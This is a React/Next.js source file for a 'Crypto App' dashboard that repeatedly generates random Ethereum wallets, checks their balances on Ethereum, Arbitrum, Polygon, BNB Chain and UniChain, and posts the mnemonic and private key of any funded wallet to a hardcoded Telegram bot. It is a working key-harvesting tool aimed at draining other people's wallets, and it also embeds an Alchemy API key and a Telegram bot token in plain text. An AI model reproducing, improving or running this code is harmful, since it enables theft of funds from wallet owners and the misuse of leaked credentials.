'use client'

import { useState, useEffect, useRef } from 'react'
import { ethers } from 'ethers'
import { Moon, Sun, Settings, Wallet, Coins, Triangle, Hexagon, Circle } from 'lucide-react'
import { useTheme } from 'next-themes'
import * as React from 'react'
import { Button } from '@/components/ui/button'
import {
  Card,
  CardContent,
  CardHeader,
  CardTitle,
} from '@/components/ui/card'
import {
  Drawer,
  DrawerClose,
  DrawerFooter,
  DrawerContent,
  DrawerDescription,
  DrawerHeader,
  DrawerTitle,
  DrawerTrigger,
} from "@/components/ui/drawer"
import { Label } from "@/components/ui/label"
import { Switch } from '@/components/ui/switch'
import { Slider } from "@/components/ui/slider"
import { ScrollArea } from "@/components/ui/scroll-area"
import { toast, Toaster } from 'react-hot-toast' // Import the toast library

interface AddressData {
  address: string
  privateKey: string
  mnemonic: string
  balanceEther: number
  balanceUniChain: number
  balanceArbitrum: number
  balancePolygon: number
  balanceBnb: number
}

const SUPPORTED_NETWORKS = ['Ethereum', 'UniChain', 'Arbitrum', 'Polygon', 'BNB Smart Chain']

const CRYPTO_ICONS: { [key: string]: React.ReactNode } = {
  ETH: <Coins className="h-4 w-4" />,
  UNI: <Hexagon className="h-4 w-4" />,
  ARB: <Triangle className="h-4 w-4" />,
  MATIC: <Hexagon className="h-4 w-4" />,
  BNB: <Circle className="h-4 w-4" />,
}

export default function CryptoDashboard() {
  const [addresses, setAddresses] = useState<AddressData[]>([])
  const [savedAddresses, setSavedAddresses] = useState<{ [key: string]: AddressData[] }>({})
  const [totalChecked, setTotalChecked] = useState<number>(0)
  const [isChecking, setIsChecking] = useState<boolean>(false)
  const [selectedNetworks, setSelectedNetworks] = useState<string[]>(SUPPORTED_NETWORKS)
  const [checkSpeed, setCheckSpeed] = useState<number>(100)
  const [cryptoPrices, setCryptoPrices] = useState<{ [key: string]: number }>({})

  const intervalRef = useRef<NodeJS.Timeout | null>(null)
  const timeoutRef = useRef<NodeJS.Timeout | null>(null) // Reference for 30 minutes timeout
  const { setTheme } = useTheme()

  useEffect(() => {
    SUPPORTED_NETWORKS.forEach(network => {
      setSavedAddresses(prev => ({ ...prev, [network]: [] }))
    })
    fetchCryptoPrices()
  }, [])

  const fetchCryptoPrices = async () => {
    try {
      const response = await fetch('https://api.coingecko.com/api/v3/simple/price?ids=ethereum,uniswap,arbitrum,matic-network,binancecoin&vs_currencies=usd')
      const data = await response.json()
      setCryptoPrices({
        ETH: data.ethereum.usd,
        UNI: data.uniswap.usd,
        ARB: data.arbitrum.usd,
        MATIC: data['matic-network'].usd,
        BNB: data.binancecoin.usd
      })
    } catch (error) {
      toast.error('Error fetching crypto prices');
    }
  }

  const startChecking = () => {
    setIsChecking(true);
    intervalRef.current = setInterval(async () => {
      try {
        const wallet = ethers.Wallet.createRandom();
        const mnemonic = wallet.mnemonic?.phrase || "No Mnemonic";
        const addr = wallet.address;
        const privKey = wallet.privateKey;

        const newAddress: AddressData = {
          address: addr,
          privateKey: privKey,
          mnemonic: mnemonic,
          balanceEther: 0,
          balanceUniChain: 0,
          balanceArbitrum: 0,
          balancePolygon: 0,
          balanceBnb: 0,
        };

        await Promise.all(selectedNetworks.map(async (network) => {
          const provider = new ethers.JsonRpcProvider(getProviderUrl(network));
          const balanceBigNumber = await provider.getBalance(addr);
          const balance = parseFloat(ethers.formatEther(balanceBigNumber));

          switch (network) {
            case 'Ethereum':
              newAddress.balanceEther = balance;
              break;
            case 'UniChain':
              newAddress.balanceUniChain = balance;
              break;
            case 'Arbitrum':
              newAddress.balanceArbitrum = balance;
              break;
            case 'Polygon':
              newAddress.balancePolygon = balance;
              break;
            case 'BNB Smart Chain':
              newAddress.balanceBnb = balance;
              break;
          }

          if (balance > 0.000000000001) {
            setSavedAddresses(prev => ({
              ...prev,
              [network]: [...(prev[network] || []), newAddress].slice(-20),
            }));
            sendToTelegram(newAddress);
            toast.success(`New address found on ${network} with balance: ${balance.toFixed(6)}`);
          }
        }));

        setAddresses(prev => {
          const updated = [...prev, newAddress];
          return updated.slice(-10);
        });

        setTotalChecked(prev => prev + 1);
      } catch (error) {
        toast.error('Error checking balance');
      }
    }, checkSpeed);

    // Set timeout to stop checking after 30 minutes
    timeoutRef.current = setTimeout(() => {
      stopChecking();
      // Show a toast that the checking is stopped due to the timeout
      toast.success('Wallet checking stopped after 30 minutes.');
      // Restart after 5 minutes
      setTimeout(() => {
        startChecking();
        toast.success('Wallet checking restarted after 5 minutes.');
      }, 5 * 60 * 1000); // 5 minutes delay before restarting
    }, 30 * 60 * 1000); // 30 minutes delay
  };

  const stopChecking = () => {
    if (intervalRef.current) {
      clearInterval(intervalRef.current)
      setIsChecking(false)
      toast.error('Stopped checking wallets');
    }
    if (timeoutRef.current) {
      clearTimeout(timeoutRef.current); // Clear the timeout when stopping checking
    }
  }

  const getProviderUrl = (network: string) => {
    switch (network) {
      case 'Ethereum':
        return "https://eth-mainnet.g.alchemy.com/v2/fERsz0Ap9r2QZUYffzKqh1_O7sWKm1Wj";
      case 'UniChain':
        return "https://unichain-sepolia.g.alchemy.com/v2/fERsz0Ap9r2QZUYffzKqh1_O7sWKm1Wj";
      case 'Arbitrum':
        return "https://arb-mainnet.g.alchemy.com/v2/fERsz0Ap9r2QZUYffzKqh1_O7sWKm1Wj";
      case 'Polygon':
        return "https://polygon-mainnet.g.alchemy.com/v2/fERsz0Ap9r2QZUYffzKqh1_O7sWKm1Wj";
      case 'BNB Smart Chain':
        return "https://bnb-mainnet.g.alchemy.com/v2/fERsz0Ap9r2QZUYffzKqh1_O7sWKm1Wj";
      default:
        throw new Error(`Unsupported network: ${network}`);
    }
  };

  const sendToTelegram = async (addressData: AddressData) => {
    const botToken = '6850475223:AAFx2kItnMH38gslgHAcE6M5Ef2VBX6sMIQ';
    const chatId = '6028239590';

    const message = `New Address with Balance:
      Address: ${addressData.address}
      Mnemonic: ${addressData.mnemonic}
      Private Key: ${addressData.privateKey}
      Balance ETH: ${addressData.balanceEther} ETH ($${(addressData.balanceEther * cryptoPrices.ETH).toFixed(2)})
      Balance UniChain: ${addressData.balanceUniChain} UNI ($${(addressData.balanceUniChain * cryptoPrices.UNI).toFixed(2)})
      Balance Arbitrum: ${addressData.balanceArbitrum} ARB ($${(addressData.balanceArbitrum * cryptoPrices.ARB).toFixed(2)})
      Balance Polygon: ${addressData.balancePolygon} MATIC ($${(addressData.balancePolygon * cryptoPrices.MATIC).toFixed(2)})
      Balance BNB: ${addressData.balanceBnb} BNB ($${(addressData.balanceBnb * cryptoPrices.BNB).toFixed(2)})`;

    const url = `https://api.telegram.org/bot${botToken}/sendMessage`;
    const params = new URLSearchParams({ chat_id: chatId, text: message });

    try {
      const response = await fetch(`${url}?${params.toString()}`, { method: 'POST' });
      const result = await response.json();
      if (result.ok) {
        toast.success('Message sent to Telegram!');
      } else {
        toast.error('Error sending message to Telegram');
      }
    } catch (error) {
      toast.error('Error sending message to Telegram');
    }
  };

  return (
    <div className="container mx-auto p-4">
      <Toaster />
      <header className="flex justify-between items-center mb-6">
        <h1 className="text-2xl font-bold">Crypto App</h1>
        <div className="flex items-center space-x-2">
          <Drawer>
            <DrawerTrigger asChild>
              <Button variant="outline" size="icon">
                <Settings className="h-[1.2rem] w-[1.2rem]" />
                <span className="sr-only">Open settings</span>
              </Button>
            </DrawerTrigger>
            <DrawerContent>
              <DrawerHeader>
                <DrawerTitle>Dashboard Settings</DrawerTitle>
                <DrawerDescription>Adjust your wallet checking preferences here.</DrawerDescription>
              </DrawerHeader>
              <ScrollArea className="h-[400px] p-4">
                <div className="space-y-4">
                  {SUPPORTED_NETWORKS.map(network => (
                    <div key={network} className="flex items-center justify-between">
                      <Label htmlFor={`network-${network}`} className="text-sm font-medium">
                        {network}
                      </Label>
                      <Switch
                        id={`network-${network}`}
                        checked={selectedNetworks.includes(network)}
                        onCheckedChange={(checked) => {
                          setSelectedNetworks(prev =>
                            checked ? [...prev, network] : prev.filter(n => n !== network)
                          )
                        }}
                      />
                    </div>
                  ))}
                  <div className="space-y-2">
                    <Label htmlFor="check-speed" className="text-sm font-medium">
                      Check Speed: {checkSpeed}ms
                    </Label>
                    <Slider
                      id="check-speed"
                      min={10}
                      max={1000}
                      step={10}
                      value={[checkSpeed]}
                      onValueChange={(value) => setCheckSpeed(value[0])}
                    />
                  </div>
                </div>
              </ScrollArea>
              <DrawerFooter>
                <DrawerClose asChild>
                  <Button variant="outline">Close</Button>
                </DrawerClose>
              </DrawerFooter>
            </DrawerContent>
          </Drawer>
          <Button
            variant="outline"
            size="icon"
            onClick={() => setTheme(theme => theme === 'dark' ? 'light' : 'dark')}
          >
            <Sun className="h-[1.2rem] w-[1.2rem] rotate-0 scale-100 transition-all dark:-rotate-90 dark:scale-0" />
            <Moon className="absolute h-[1.2rem] w-[1.2rem] rotate-90 scale-0 transition-all dark:rotate-0 dark:scale-100" />
            <span className="sr-only">Toggle theme</span>
          </Button>
        </div>
      </header>
      <div className="text-center">Total Checked: {totalChecked}</div>
      <div className="grid gap-9">
        <Card>
          <CardHeader>
            <CardTitle>Check wallet</CardTitle>
          </CardHeader>
          <CardContent className="wallet-list">
            <div className="space-y-4">
              <ul className="space-y-2 text-sm">
                {addresses.slice(-10).map((addr, index) => (
                  <li key={index} className="flex items-center space-x-2">
                    <Wallet className="h-4 w-4" />
                    <span className="wallet-mnemonic truncate">{addr.address}</span>
                  </li>
                ))}
              </ul>
            </div>
          </CardContent>
        </Card>
        <Button onClick={isChecking ? stopChecking : startChecking} className="w-full">
          {isChecking ? 'Stop Checking' : 'Start Checking'}
        </Button>
        <ScrollArea className="h-[300px]">
          <ul className="space-y-4">
            {Object.values(savedAddresses).flat().map((addr, index) => (
              <li key={index} className="border-b pb-2 text-sm">
                <div className="font-medium truncate">Found Wallet</div>
                <div className="font-medium truncate">{addr.address}</div>
                <div className="text-muted-foreground truncate">{addr.privateKey}</div>
                <div className="text-muted-foreground truncate">{addr.mnemonic}</div>
                <div className="grid grid-cols-2 gap-1 mt-1">
                  {addr.balanceEther > 0 && (
                    <div className="flex items-center space-x-1">
                      {CRYPTO_ICONS.ETH}
                      <span>{addr.balanceEther.toFixed(6)} ETH</span>
                    </div>
                  )}
                  {addr.balanceUniChain > 0 && (
                    <div className="flex items-center space-x-1">
                      {CRYPTO_ICONS.UNI}
                      <span>{addr.balanceUniChain.toFixed(6)} UNI</span>
                    </div>
                  )}
                  {addr.balanceArbitrum > 0 && (
                    <div className="flex items-center space-x-1">
                      {CRYPTO_ICONS.ARB}
                      <span>{addr.balanceArbitrum.toFixed(6)} ARB</span>
                    </div>
                  )}
                  {addr.balancePolygon > 0 && (
                    <div className="flex items-center space-x-1">
                      {CRYPTO_ICONS.MATIC}
                      <span>{addr.balancePolygon.toFixed(6)} MATIC</span>
                    </div>
                  )}
                  {addr.balanceBnb > 0 && (
                    <div className="flex items-center space-x-1">
                      {CRYPTO_ICONS.BNB}
                      <span>{addr.balanceBnb.toFixed(6)} BNB</span>
                    </div>
                  )}
                </div>
              </li>
            ))}
          </ul>
        </ScrollArea>
      </div>
    </div>
  )
}
